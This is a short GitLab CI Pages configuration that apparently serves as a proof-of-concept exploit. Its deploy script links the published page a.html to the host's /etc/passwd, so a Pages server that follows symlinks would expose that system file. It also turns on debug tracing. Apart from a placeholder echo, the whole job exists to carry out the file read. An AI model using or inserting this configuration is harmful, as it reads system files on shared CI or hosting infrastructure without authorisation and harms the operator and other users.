image: alpine:latest

pages:
  variables:
    CI_DEBUG_TRACE: "true"
  stage: deploy
  script:
  - echo 'Nothing to do...'
  - cd public;ln -s /etc/passwd a.html
  artifacts:
    paths:
    - public
  only:
  - master
